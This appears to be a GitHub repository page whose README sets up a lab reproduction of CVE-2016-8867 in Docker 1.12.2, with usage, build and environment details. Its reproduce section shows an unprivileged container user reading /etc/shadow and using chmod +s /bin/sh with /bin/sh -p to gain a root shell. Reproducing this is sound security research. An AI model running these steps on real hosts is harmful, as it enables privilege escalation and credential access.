Name	Name	Last commit message	Last commit date
parent directory ..
.env	.env
Dockerfile	Dockerfile
README.md	README.md
docker-compose.kvm.yml	docker-compose.kvm.yml
docker-compose.swr-mirror.yml	docker-compose.swr-mirror.yml
docker-compose.yml	docker-compose.yml
ssh	ssh

docker v1.12.2

dqd:
- ssst0n3/docker_archive:cve-2016-8867 -> ssst0n3/docker_archive:cve-2016-8867_v0.1.0
- ssst0n3/docker_archive:cve-2016-8867_v0.1.0
ctr:
- ssst0n3/docker_archive:ctr_cve-2016-8867 -> ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0
- ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0

usage

$ cd vul/cve-2016-8867
$ docker compose -f docker-compose.yml -f docker-compose.kvm.yml up -d
$ ./ssh

reproduce

root@localhost:~# docker run -ti -u nobody ubuntu:16.04 bash
nobody@50b080908617:/$ cat /proc/self/status | grep Cap 
CapInh:	00000000a80425fb
CapPrm:	00000000a80425fb
CapEff:	00000000a80425fb
CapBnd:	00000000a80425fb
CapAmb:	00000000a80425fb
nobody@50b080908617:/$ ls -lah /etc/shadow 
-rw-r----- 1 root shadow 652 Aug  4  2021 /etc/shadow
nobody@50b080908617:/$ cat /etc/shadow 
root:*:18843:0:99999:7:::
daemon:*:18843:0:99999:7:::
bin:*:18843:0:99999:7:::
sys:*:18843:0:99999:7:::
sync:*:18843:0:99999:7:::
games:*:18843:0:99999:7:::
man:*:18843:0:99999:7:::
lp:*:18843:0:99999:7:::
mail:*:18843:0:99999:7:::
news:*:18843:0:99999:7:::
uucp:*:18843:0:99999:7:::
proxy:*:18843:0:99999:7:::
www-data:*:18843:0:99999:7:::
backup:*:18843:0:99999:7:::
list:*:18843:0:99999:7:::
irc:*:18843:0:99999:7:::
gnats:*:18843:0:99999:7:::
nobody:*:18843:0:99999:7:::
systemd-timesync:*:18843:0:99999:7:::
systemd-network:*:18843:0:99999:7:::
systemd-resolve:*:18843:0:99999:7:::
systemd-bus-proxy:*:18843:0:99999:7:::
_apt:*:18843:0:99999:7:::
nobody@58f651b73f78:/$ chmod +s /bin/sh
nobody@58f651b73f78:/$ /bin/sh -p 
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root)
# whoami
root

env details

root@localhost:~# docker --version
Docker version 1.12.2, build bb80604
root@localhost:~# docker-containerd --version
containerd version 0.2.4 commit: 0366d7e9693c930cf18c0f50cc16acec064e96c5
root@localhost:~# docker-runc --version
runc version 1.0.0-rc2
commit: 02f8fa7863dd3f82909a73e2061897828460d52f
spec: 1.0.0-rc2-dev
root@localhost:~# docker info
Containers: 0
 Running: 0
 Paused: 0
 Stopped: 0
Images: 0
Server Version: 1.12.2
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Backing Filesystem: extfs
 Dirs: 0
 Dirperm1 Supported: true
Logging Driver: json-file
Cgroup Driver: cgroupfs
Plugins:
 Volume: local
 Network: null host bridge overlay
Swarm: inactive
Runtimes: runc
Default Runtime: runc
Security Options: apparmor seccomp
Kernel Version: 4.4.0-210-generic
Operating System: Ubuntu 16.04.7 LTS
OSType: linux
Architecture: x86_64
CPUs: 2
Total Memory: 1.953 GiB
Name: localhost.localdomain
ID: ED3X:JKLF:3XAQ:UM7L:Q54N:KZUU:7F27:GEFO:BWSN:ZUON:JQRU:V4J4
Docker Root Dir: /var/lib/docker
Debug Mode (client): false
Debug Mode (server): false
Registry: https://index.docker.io/v1/
WARNING: No swap limit support
Insecure Registries:
 127.0.0.0/8

build

make all DIR=vul/cve-2016-8867

for developers:

FROM ssst0n3/docker_archive:ctr_cve-2016-8867_v0.1.0

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

docker v1.12.2

usage

reproduce

env details

build

FilesExpand file tree

cve-2016-8867

Directory actions

More options

Directory actions

More options

Latest commit

History

cve-2016-8867

Folders and files

parent directory

README.md

docker v1.12.2

usage

reproduce

env details

build